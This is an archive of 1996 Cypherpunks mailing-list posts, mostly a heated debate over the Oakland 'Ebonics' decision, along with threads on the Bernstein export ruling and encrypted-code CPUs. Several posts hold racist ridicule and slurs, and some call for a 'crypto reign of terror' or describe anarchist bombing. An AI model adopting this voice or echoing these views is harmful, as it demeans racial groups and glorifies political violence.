> > the so-called White Trash or heavy Southern accents, which are violate
just
> > as many prissy and stuck up rules of grammar as Ebonics
> 
> No mention was made of "White Trash".  You're drawing an invalid
conclusion.
	Yes, though your same discrimination rules apply to "White Trash." I want
to see if your language discrimination applies only to black Ebonics or to
the white Southern twang also.

> > 	I also think that you are forgetting about the human aspect of your
> > discrimination. For a second, put yourself in the place of a really
smart
> > black guy applying for a job at Intel. He is overqualified for the job.
You
> 
> There is a logical correlation between intelligence and being able to
follow
> English grammatical rules.
	Not really. America is an incredibly diverse place. There are parts of the
country where correct English-speaking people are minorities; if you've
grown up in one of these places, you'll speak the native dialect no matter
how smart or stupid your are.

> Crypto will allow people to actively discriminate against whomever they
wish.
> It will also allow those who would be discriminated against to protect
> information about themselves to prevent discrimination.  I don't support
> discrimination based on race, but language is a completely different
matter.
	Spoken language, which is what you're discriminating against is vastly
different from typed language. Everyone types pretty much the same way but
everyone speaks differently. People who speak in Ebonics or with a Southern
twang often know the rules of grammar, as expressed in writing, but they do
not speak "correctly" because they are not accustomed to doing so.

> P.S. Spelling and grammar flames will be ignored.
	What?! How can you say this? According to your position, it is my right to
flame you because, as a better grammarian and orthographer, I am more
intelligent than you and you should know this. In fact, your viewpoint can
be extrapolated to say that anyone who make a grammar or spelling mistake
in any message should be thrown off the list becuase they are not
intelligent.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chuck <chuck@nova1.net>
Date: Sat, 21 Dec 1996 14:59:30 -0800 (PST)
To: cypherpunks@toad.com
Subject: EBONIC.ORG
Message-ID: <1.5.4.32.19961221215040.006cb3d4@mail.nova1.net>
MIME-Version: 1.0
Content-Type: text/plain


Lets stop complaining and do something to promote dialectic harmony.  How
about an online Ebonics/English dictionary?  Yesterday, I acquired the
domain <ebonic.org> for this purpose (ebonics.org and com were already
assigned). In the spirit of inter-dialectic cooperation, I hereby offer it
for use as an online dictionary.

This is, of course, a time-consuming effort to both design and maintain, so
offers of help will be greatly appreciated.  It seems to me that a
guestbook-type function might be the best way to allow interested parties to
add words, their definitions and pronunciation guides to the dictionary.
What do you think?  We might want to consider an opportunity for
illustrations too.  It seems to me that many of the Ebonics expressions I've
heard are emphasized through the use of gestures - often with multiple
digits pointing in various directions.

In order not to be seen as uncaring, I think it would be nice to ask the
Oakland School District to help.  After all, if anyone should know the
dialect, it would be them.  Of course, this will be an ongoing effort,
considering that the dialect will change with each new malapropism spouted
by some thirteen-year-old rap star with a learning disability.

Lets be clear about this. It will certainly be in the best interest of every
American  citizen to understand Ebonics.  Had this issue been raised prior
to the last election, my guess is that we would have all heard Clinton
campaigning in Ebonics.  Without an understanding of Ebonics, or a
translator, we might not have been able to understand him.  Think of what we
would have missed!  And that's not all.  Suppose that while stopped at a
traffic light, an Ebonics speaker approaches your car to ask to borrow it.
He says something on the order of "gheeowtdakamuthafucka!".  You respond
with "say what?".  Bingo, what we got here is a failure to communicate.  The
next thing you know, you're shouting at each other.  Pretty soon, shots are
fired and a crowd gathers around your car.  The car begins to rock, glass
begins to break.  You are arrested for leaving the scene of an accident and
for violating the civil rights of the Ebonics speaker.  All because you
didn't take the time to understand his language.  Having an unabridged
Ebonics/English Dictionary available on the net could help to save untold
numbers of people from having such an experience.

I hope the site will be up in a week or so, in the meantime, you may
communicate via the list or directly to me at <chuck@ebonic.org>.  Remember,
we be needin yo hep.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 21 Dec 1996 13:22:10 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Slaughter
In-Reply-To: <Pine.SOL.3.91.961221091226.2763B-100000@rigel.infonex.com>
Message-ID: <i01aZD46w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Jeffrey A Nimmo <janimmo@rigel.infonex.com> writes:

> On Sat, 21 Dec 1996, Carl Johnson wrote:
>
> >    "They came for the Jews, and I wasn't a Jew, so I didn't speak up.
> > They came for the National Socialists, and I wasn't a National Socialist,
> > so I didn't speak up.  Then they came for me.
> >    "And nobody spoke up."
>
> "They" came for the Jews AND the Nazis? Damn, they wanted to cover all
> the bases didn't they?

"They" being the "cypher punks", I presume?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blake Coverett <blake@bcdev.com>
Date: Sat, 21 Dec 1996 12:56:28 -0800 (PST)
To: "cryptography@c2.net>
Subject: RE: Reflections on the Bernstein ruling
Message-ID: <01BBEF57.7D139850@bcdev.com>
MIME-Version: 1.0
Content-Type: text/plain


Greg Broiles wrote:
> In brief, Judge Patel ruled that Category XIII(b) (the category which
> refers to cryptographic equipment/software) is unconstitutional because it
> functions as a prior restraint upon speech without providing important
> procedural safeguards which are required when a prior restraint scheme is
> put into place. She ruled that the "technical data" provision of the ITAR
> is also unconstitutional when it refers to technical data about Category
> XIII(b) items because of the lack of procedural safeguards.

I'm not even remotely a lawyer, but I have to disagree with the second 
sentence above.  As I read it Judge Patel believes that the technical
data provisions are also unconstitutional but can not rule that way
because United States v. Edler, 579 F.2d 516 (9th Cir. 1978) is the
law in the 9th circuit.  The relevant quote is:

    While this court is inclined to agree, despite revisions to the
    ITAR since 1984 and especially in light of Freedman and FW/PBS, Edler
    remains the law of this Circuit and this court is bound by its
    holding.[13] Moreover, Edler was reaffirmed, albeit in cursory fashion,
    by the Ninth Circuit in 1989. United States v. Posey, 864 F.2d 1487,
    1496 (9th Cir.  1989). If the Ninth-Circuit wants to reconsider those
    opinions it is free to do so, but that decision is theirs to make.

Happily she does go on to say that because she has ruled that
Category XIII(b) is unconstitutional that the technical data provisions
for items relating to XIII(b) are unenforceable.

regards,
-Blake




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 21 Dec 1996 13:20:29 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Dale defends free society from the NSApunks (was Re: Encryption ?
In-Reply-To: <Pine.A41.3.95.961221113152.114412A-100000@fn2.freenet.edmonton.ab.ca>
Message-ID: <cF2aZD48w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Graham-John Bullers <real@freenet.edmonton.ab.ca> writes:

> Problem with sex?

No, thank you, Graham.  Stick you alt.2600.moderated (an even lamer forum
than thew "cypher punks" mailing list, if you can imagine that).

>
>         http://www.freenet.edmonton.ab.ca/~real/index.html
>
>                                           : real@freenet.edmonton.ab.ca
> Graham-John Bullers                  email
>                                           : ab756@freenet.toronto.on.ca

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Sat, 21 Dec 1996 15:54:07 -0800 (PST)
To: cypherpunks@toad.com
Subject: RE: The Ebonic Plague
In-Reply-To: <01BBEF4B.F9E5E740@king1-05.cnw.com>
Message-ID: <v03007800aee22a52f865@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:31 PM -0800 12/21/96, blanc wrote:
>From:	Timothy C. May
>
>Democracy has run amok in this country. There is no hope for reforming at
>the ballot box, as democracy only makes things worse. Only a crypto reign
>of terror can purge this land of the scum.
>......................................................
>
>
>Just how would this take shape in "real life" - what would constitute this
>reign of terror; how do you envision such an event in action?
>
>And which are the scum who would be purged?

The answer is implicit in many of my hundreds of posts.

As to the scum who need purging: welfare recipients, both personal and
corporate, government employees at all levels, and so on.

--Tim May

Just say "No" to "Big Brother Inside"
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Sat, 21 Dec 1996 16:00:53 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Ebonics
In-Reply-To: <3.0.32.19961221174943.006b95c0@mail.execpc.com>
Message-ID: <v03007801aee22ae61b2c@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:49 PM -0600 12/21/96, Matthew J. Miszewski wrote:

>Are you talking about the School Board requirements?  Are you still in High
>School, Tim? ;-)  I have never heard you speak of children, so you might
>have a valid complaint if you have them in public schools (although home
>schooling is still an option).

The principle is of interest to even those without schoolaged children!
Neither having schoolaged children nor living in the Oakland Public School
System district is a necessary condition for commenting on the foolishness
of "Ebonics" and other such scams. Only the most naive of commentators says
things like "If your children were not cannibalized by Jeffrey Dahmer, why
do you feel the need to comment on Dahmer?"

(Sorry, Matthew, but I'm losing any remaining respect for your rhetorical
skills. I used to think we just disagreed politically, now I see more is
involved.)

>I realize you dont agree with the tactics of some black leaders in this
>country, but I dont understand why you have this need to cloak your
>arguments in such antagonizing language.  You, of course, are free to do
>so, I just find it counter-productive albeit sometimes humourous.

I was speaking of "Ebonics." That many "black leaders" support so
transparent a scam and backward step is a separate issue, though, I
confess, not an unexpected one.

--Tim May

Just say "No" to "Big Brother Inside"
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Omegaman <omega@bigeasy.com>
Date: Sat, 21 Dec 1996 13:01:07 -0800 (PST)
To: Mark Rosen <mrosen@peganet.com>
Subject: Re: Ebonics
In-Reply-To: <199612211754.MAA04080@mercury.peganet.com>
Message-ID: <Pine.LNX.3.95.961221155712.1265A-100000@jolietjake.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 21 Dec 1996, Mark Rosen wrote:

> 	* You are making glaring generalizations regarding all members of an
> ethnic body; you don't seem to realize that intellect is based not on color
> or how you talk but on your brain (which has the same color and other basic
> properties in all humans, I believe)

That's not what was said.  He said he would not hire on the basis of a
person's inability to speak the English language.  That has nothing
whatsoever to do with color.    If you can't communicate with your
co-workers, how can you expect to get any work done?

> 	* You are completely forgetting the other "non-English" group in America;
> the so-called White Trash or heavy Southern accents, which are violate just
> as many prissy and stuck up rules of grammar as Ebonics

(In my thickest Southern Accent) Fuck you.  Speaking with an accent and
speaking proper english are not mutually exclusive. Ebonics and like notions
are an insult.

> 	I also think that you are forgetting about the human aspect of your
> discrimination. For a second, put yourself in the place of a really smart
> black guy applying for a job at Intel. He is overqualified for the job. You
> turn him down. Have you ever wondered what it does to a person to be turned
> down not on the basis of their moral character or intellect but by their
> skin? For someone to be told that they are stupid and are not competent to
> do this job? You don't realize that you are crushing _human_ lives, people
> who have feelings. If you would just put yourself in their place, you would
> realize the hurt that your are inflicting.

How did you get this out of the previous post?  If the person is indeed
overqualified, chances are he/she can and will speak English rather than
(let's face it) slang in a job interview.

> 	Out of curiousity, do you refuse from hiring people with Southern Accents?
> Or people who have heavy "asian" accents? I'm very surprised that a smart
> person like you, who believes in the power of strong cryptography, one of
> the greatest equalizing forces in the world, actively discriminates against
> other people who don't look or talk like you.

As has been pointed out in the past, crypto and technology can also be used
to enforce discriminatory practices.  Take off your rosen colored glasses.
Furthermore, there is a great difference between a heavy "asian" accent and
ebonics.  A person who struggles with the English language because it is not
his native tongue, I respect.  The notion that "black English" is a
separate language is absurd.  It is slang. 

me
off to eat my grits and learn me sum perl.
_______________________________________________________________
 Omegaman <mailto:omega@bigeasy.com> 
  PGP Key fingerprint = 6D 31 C3 00 77 8C D1 C2
                        59 0A 01 E3 AF 81 94 63 
 Send e-mail with "get key" in the "Subject:" 
 field to get a copy of my public key
_______________________________________________________________






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Martin Minow <minow@apple.com>
Date: Sat, 21 Dec 1996 16:20:32 -0800 (PST)
To: "Timothy C. May" <cypherpunks@toad.com
Subject: Re: The Ebonic Plague
In-Reply-To: <199612210710.XAA23943@netcom16.netcom.com>
Message-ID: <v03007800aee22e0c3e1d@[204.179.128.33]>
MIME-Version: 1.0
Content-Type: text/plain


Two minor points:

First, Ebonics (Black English) is grammatical, but its grammar differs
from that of standard American English.

Second, from what I heard on the news, Oakland wants to call it a
separate language because they discovered that they got better results
teaching standard English to Black students if they used secondary
language techniques, as opposed to treating Black English constructions
as "wrong" or "inferior."

Martin Minow
minow@apple.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 21 Dec 1996 14:02:01 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Slaughter
In-Reply-To: <32BC218C.1B92@gte.net>
Message-ID: <cq3aZD51w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Dale Thorn <dthorn@gte.net> writes:
> >    There is a quote I remember which struck me deeply when I heard it,
> > but forgive me if it is not quite correct:
> >    "They came for the Jews, and I wasn't a Jew, so I didn't speak up.
> > They came for the National Socialists, and I wasn't a National Socialist,
> > so I didn't speak up.  Then they came for me. "And nobody spoke up."

Replacing trade unionists by national socialists? An interesting Freudian slip.

> As I remember the quote, it ended something like "and they came for me,
> but there was nobody left to speak up".
>
> [mo' snip]
>
> > "You will take my cryptography from me when you pry it from my
> > cold, dead algorithms."  Think about cryptography.
>
> We're all thinking about it.  We just don't believe (naively) that just
> because someone issues code that was designed 20 years ago, and which
> the NSA can undoubtedly crack in a heartbeat, that that code can
> necessarily protect us against all comers.
>
> There is a difference between principle and fact.  You have the
> principles exactly correct, but as to facts, you have to be eternally
> vigilant, i.e., don't get too comfortable with PGP et al.

The use of encryption in civilial life should as ubiquitous as it is in the
military. The distance from weak crypto to strong crypto is much shorter than
the distance from no crypto to some crypto deployed. Deployment of crypto
takes a serious investment in the infrastructure (such as procedures and
protocols for key distribution), but this investment can be recycled for the
next, stronger, crypto.

Instead of writing code, "cypher punks" verbally abuse anyone who's actually
capable of writing code and proposing new programs and cryptoschemes to
supplant or complement the short list of "cypher punks"-approved apps - recall
Don Wood, literally drowned in obscenities by Paul Bradley.

Instead of encouraging the deployment of crypto, "cypher punks" whine about
the export controls - the circle jerk practices by the punks and their friends
in USG designed to make each other feel important. But in reality neither
punks nor the export controls are relevant. Copyright and libel laws are
irrelevant on the Internet. Child porn is punishable hardeer than strong
crypto, yet there are tons of it on Usenet. USG and other governments are
irrelevant. So are the punks who battle them instead of deploying crypto.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 21 Dec 1996 14:00:21 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Dale defends free society from the NSApunks
In-Reply-To: <199612211514.HAA26831@mailmasher.com>
Message-ID: <BV4aZD52w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


nobody@huge.cajones.com (Huge Cajones Remailer) writes:

> :Date: Fri, 20 Dec 1996 14:10:11 -0800
> :From: Rich Graves <rcgraves@disposable.com>
>
> :Stop bashing Dale, you ADL/CFR/NSA thought police, you.
>
> I can recognize sarcasm!
>
> You're on the list! Yes, THE list!
>
> Yours from NSA.

For those who don't know what kind of slimeball Rich Graves is:
Rich Graves is a paranoid Jewhater who likes to harrass Jews by
spamming inappropriate public forums with Holocaust flame bait.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Foley <mycroft@actrix.gen.nz>
Date: Fri, 20 Dec 1996 21:11:00 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Executing Encrypted Code
In-Reply-To: <v02140b08aee0befb6cdb@[192.0.2.1]>
Message-ID: <199612210358.QAA12208@mycroft.actrix.gen.nz>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 20 Dec 1996 14:28:49 -0800, Peter Hendrickson wrote:

   I would expect software prices to drop because everybody using the software
   would be paying for it.  I would also expect more kinds of software to become
   available.

What ever happened to charging what the market will bear?  Why would
they voluntarily drop their prices just because the software can't be
pirated?

-- 
Paul Foley <mycroft@actrix.gen.nz>       ---         PGPmail preferred

	   PGP key ID 0x1CA3386D available from keyservers
    fingerprint = 4A 76 83 D8 99 BC ED 33  C5 02 81 C9 BF 7A 91 E8
----------------------------------------------------------------------
Cat, n.:
	Lapwarmer with built-in buzzer.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Sat, 21 Dec 1996 16:54:53 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Ebonics
In-Reply-To: <3.0.32.19961221180621.006965f0@mail.execpc.com>
Message-ID: <v03007800aee2364954fd@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:06 PM -0600 12/21/96, Matthew J. Miszewski wrote:

>Why is it that personal freedom, sometimes expressed by choice of dialect
>or language, seemingly has such arbitrary limits?  Many on the list
>complain that they are subject to too many rules, and yet, seem to chime in
>on multi-linugual issues in this way.

You're confusing issues. As with similar confusions about "right to work"
(where the putative conflict is between Alice's right to hire whom she
chooses and Bob's putative "right to a job"), the confusion lies in what
one calls a right.

No one is disputing the "right" of anyone to speak in any language he or
she chooses. What the bulk of persons who have heard of the "Ebonics" story
in the last few days are doing is ridiculing it, satirizing it, shaking
their heads, and noting the backward steps it represents for so-called
"peeples of color."

Oh, and there's of course an undercurrent of "Why should taxpayers pay for
"Ebonics"?," which is hardly surprising, given that we also complain about
funding for lots of wasteful programs.

Finally, a civil libertarian would understand that any person and any
employer has the property right to not hire those he does not wish to hire.
(I speak in terms of basic rights, however one thinks they derive, not
current Kalifornia or Federal law, such as the Title VII nonsense or the
various racial quotas.)

In short, any person may speak in any language he or she wishes. I don't
have to accomodate this person, either personally or in my business. As to
_government publications_, I think this problem is solved by anarchy. Short
of anarchy, I don't see how any government larger than a truly tiny core
set can possibly pubish official documents, ballots, traffic signs,
driver's license tests, and so on, in the several dozen languages that the
basic brown types are now clamoring for.

I say fuck 'em.

>Crypto angle, here?  Much of Ebonics has been based upon a need or desire
>to communicate in a private way.  "5-0" was initiated as a way to
>communicate the presence of a police officer.  Surely, we are not arguing
>against the development of a low-level way to scramble language.  Or in
>fact, are you arguing that attempts to curtail the police should *not* be
>encouraged?  This seems odd coming from some members of the list (Collapse
>of Governments and all) ;-).

And just where did anyone in any of these posts call for outlawing any
particular language, pidgin, slang, creole, jive, or invented lingo?

Really, Matt, go back to Rhetoric 101 and learn how to argue.

(Where is "Logos" these days?)

--Tim May

Just say "No" to "Big Brother Inside"
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jamie Lawrence <foodie@netcom.com>
Date: Sat, 21 Dec 1996 17:04:56 -0800 (PST)
To: "Matthew J. Miszewski" <mjmiski@execpc.com>
Subject: Re: Ebonics
In-Reply-To: <3.0.32.19961221180621.006965f0@mail.execpc.com>
Message-ID: <v03007805aee23879c5dd@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


Matt,

Are you honestly arguing that a system of communication
acknoledged and taught in a public school is satisfying
a 'need or desire to communicate in a private way"?

Or that Ebonics has anything to do with communicating
in the presence of a police officer?

Or that either of the above has anything to do with crypto?

If so, then I think you've said more than enough.

-j, who would like to note that nothing about my viewpoint on
Ebonics has been stated in this message.


At 6:06 PM -0600 on 12/21/96, Matthew J. Miszewski wrote:

> Crypto angle, here?  Much of Ebonics has been based upon a need or desire
> to communicate in a private way.  "5-0" was initiated as a way to
> communicate the presence of a police officer.  Surely, we are not arguing
> against the development of a low-level way to scramble language.  Or in
> fact, are you arguing that attempts to curtail the police should *not* be
> encouraged?  This seems odd coming from some members of the list (Collapse
> of Governments and all) ;-).
>
> Matt

--
"I'm about to, or I am going to, die. Either expression is used."
                - Last words of Dominique Bouhours, Grammarian, 1702
____________________________________________________________________
Jamie Lawrence                                     foodie@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Frantz <frantz@netcom.com>
Date: Sat, 21 Dec 1996 17:11:48 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Re: Executing Encrypted Code
In-Reply-To: <199612210614.BAA25984@istar.ca>
Message-ID: <v03007803aee23282cc0b@[206.217.121.78]>
MIME-Version: 1.0
Content-Type: text/plain


Let me try to sketch a design for an Encrypted Code Computer (ECC).

I will start with what has become the standard architecture for Personal
Computers/Workstations.  That is:

(1) One or more CPU chips, each of which includes a RISC core, memory
management, and L1 cache.
(2) A L2 cache memory chip.
(3) A main memory bus which either includes an I/O bus or,
(4) A separate I/O bus.

If we decrypt the code on the disk, we gain almost no piracy protection
over current systems, so we must decrypt somewhere in the memory hierarchy.
If we decrypt on the main memory bus, then it will be easy to add bus
snooping hardware to catch the unencrypted program as it is accessed.
While average computer user may not do this, the foreign pirates certainly
will.  Basically the same argument applies to decrypting in the L2 cache,
since it will be easy to sample the signals between the L2 cache and the
CPU.

That leaves us with decrypting in the CPU.  Most CPU chips have separate
instruction and data L1 caches.  If we assume separate caches for our
system, it becomes logical to decrypt the code as we load it into the L1
cache.  If we assume that we are using public key cryptography to protect
the programs, where the CPU chip has the only copy of the secret key, then
we have to solve the following problems:

(1) We have to decrypt each code line in a few cycles or the system's
performance will be much worse that a similar system without encryption.
(2) We must decrypt cache lines accessed in a basically random manner.

Point (1) means we probably want to encrypt the code with a symmetric
cypher and then encrypt the symmetric key with the CPU's public key.  There
will need to be a way of telling the CPU, "Here's a new encrypted symmetric
key for code."  To avoid having to do a public key decryption on every
process/program switch, the CPU will need a cache of symmetric keys, and
the OS will have to tell it which key-cache entry to use at any point
during execution of the program.  There will have to be a way to
automatically change the key when servicing an interrupt.

Point (2) means we can't use any of the really good encryption modes, and
are pretty much limited to ECB like modes.  If we use straight ECB mode,
then our program becomes subject to a number of cypher-text only attacks.
If we can arrange our software system so code always executes at a constant
virtual address we can reduce these attacks by salting the code cache
blocks with the virtual address.  However, constant virtual addresses make
DLLs somewhat difficult.


Given this design, we need a symmetric cypher which can be decrypted with a
logic array shallower than about 100 gates (which works out to about 5
clock cycles).  We are still going to pay a performance penalty because we
are adding clocks to a critical performance path, but perhaps we can get
Steve Jobs to sell it to the masses :-).

We still have a major problem if we want a multiprocessor system.  How do
we migrate threads between processors?  It seems that we need to have the
same key on all processors (or license and keep in memory multiple copies
of the code).  If we allow the keys off-chip, then recovering them becomes
much easier.  If we keep them on-chip, then the CPU manufacturer needs to
build CPU chips which share a secret key, with all the attendant inventory
problems etc.  (And, if I can move the CPU chips to different systems, then
I can run a single key of the software on multiple systems.)


-------------------------------------------------------------------------
Bill Frantz       | I still read when I should | Periwinkle -- Consulting
(408)356-8506     | be doing something else.   | 16345 Englewood Ave.
frantz@netcom.com | It's a vice. - R. Heinlein | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Matthew J. Miszewski" <mjmiski@execpc.com>
Date: Sat, 21 Dec 1996 15:50:49 -0800 (PST)
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Ebonics
Message-ID: <3.0.32.19961221174943.006b95c0@mail.execpc.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 08:01 PM 12/20/96 -0800, Timothy C. May wrote:

>Yeah, Matt, in a free society I wouldn't have to "speak Ebonics."
>

Are you talking about the School Board requirements?  Are you still in High
School, Tim? ;-)  I have never heard you speak of children, so you might
have a valid complaint if you have them in public schools (although home
schooling is still an option).

[Tim's Critique of currently failing attempts at social justice elided]

I realize you dont agree with the tactics of some black leaders in this
country, but I dont understand why you have this need to cloak your
arguments in such antagonizing language.  You, of course, are free to do
so, I just find it counter-productive albeit sometimes humourous.

Matt


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMrx3kbpijqL8wiT1AQE8MgP/dQIEwHGQJK68+dXjTD1Tfpc+ll/cRw59
h8bidDczb0eTqcE9SliY+3D+0eUx4OcYOR3HsKcEQjFl5vgVpUeqaywpnh9clHBU
QOLLqCpGw1plNzqjzZNc7e0SsCvVudpv93jDJdPInF/MHELxflhAJ32DRfIyt90Q
ry0EvNMfAnc=
=00J2
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 21 Dec 1996 15:09:08 -0800 (PST)
To: cypherpunks@toad.com
Subject: RE: The Ebonic Plague
Message-ID: <1.5.4.32.19961221230514.006bf3e4@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


From: Timothy C. May

Democracy has run amok in this country. There is no hope for reforming at
the ballot box, as democracy only makes things worse. Only a crypto reign
of terror can purge this land of the scum.
......................................................

From: Blanc

Just how would this take shape in "real life" - what would constitute this 
reign of terror; how do you envision such an event in action?

And which are the scum who would be purged?  
......................................................

Follow precedents of the anarchist tradition: Name a target, build a
bomb, light a fuse, heave it, run like hell -- into manacles of the
provocateur's payers, then to gallows. Wait a generation, repeat.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Matthew J. Miszewski" <mjmiski@execpc.com>
Date: Sat, 21 Dec 1996 16:07:24 -0800 (PST)
To: "Mark M." <markm@voicenet.com>
Subject: Re: Ebonics
Message-ID: <3.0.32.19961221180621.006965f0@mail.execpc.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 03:02 PM 12/21/96 -0500, Mark M. wrote:
[snip]
>There is a logical correlation between intelligence and being able to follow
>English grammatical rules.

Why is it that personal freedom, sometimes expressed by choice of dialect
or language, seemingly has such arbitrary limits?  Many on the list
complain that they are subject to too many rules, and yet, seem to chime in
on multi-linugual issues in this way.

Crypto angle, here?  Much of Ebonics has been based upon a need or desire
to communicate in a private way.  "5-0" was initiated as a way to
communicate the presence of a police officer.  Surely, we are not arguing
against the development of a low-level way to scramble language.  Or in
fact, are you arguing that attempts to curtail the police should *not* be
encouraged?  This seems odd coming from some members of the list (Collapse
of Governments and all) ;-).

Matt

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMrx7eLpijqL8wiT1AQGfmAQAnwxX/ks/LmKIrvSZi1q7PfjlU3n+/rob
05JSMNl8Qg5sj7Xsd/mdxvVwIUWd3mzz3PCyr1CKSDNVsE9miSYwnIoWCRkxOzle
dJUdEAACFX5csk/rpGMWTBpxyucmPfSugt9o6bikVWAP7Gh6YSIJobvQh6KvLMEQ
XhZErmf1vHk=
=azuR
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Three Blind Mice <3bmice@nym.alias.net>
Date: Sat, 21 Dec 1996 10:19:42 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Re: Credentials without Identity--Race Bits
Message-ID: <19961221181934.14966.qmail@anon.lcs.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 20 Dec 1996, Vangelis wrote:

> Bill Stewart wrote:
> > I've heard that in less civilized parts of the world you're actually
> > required to carry government-issued ID cards to walk down the street
> > or fly on airplanes.
> 
> Umm.. tried to get on a flight without having ID lately?  Doesn't work -
> against policy.  Anti-terrorism policy and all.. it's for your own
> safety, of course.

But my dear Vangelis, that's exactly what Bill is talking about.

--3bmice





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: drose@AZStarNet.com
Date: Sat, 21 Dec 1996 17:26:46 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Ebonics
Message-ID: <199612220126.SAA20072@web.azstarnet.com>
MIME-Version: 1.0
Content-Type: text/plain


Matthew J. Miszewski writes:

>Why is it that personal freedom, sometimes expressed by choice of dialect
>or language, seemingly has such arbitrary limits?  Many on the list
>complain that they are subject to too many rules, and yet, seem to chime in
>on multi-linugual issues in this way.

Mr. Miszewski:

As an attorney, you may be acquainted with the concept of "reasonableness."

I can certainly express my personal freedom by passing wind at home (subject
only to the possibly vociferous objections of my family).

Were I to fart in church or in a board meeting, that would be a horse of a
different color, nicht wahr?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Sat, 21 Dec 1996 18:35:25 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Executing Encrypted Code
In-Reply-To: <199612210614.BAA25984@istar.ca>
Message-ID: <v03007800aee24d5c4dbd@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


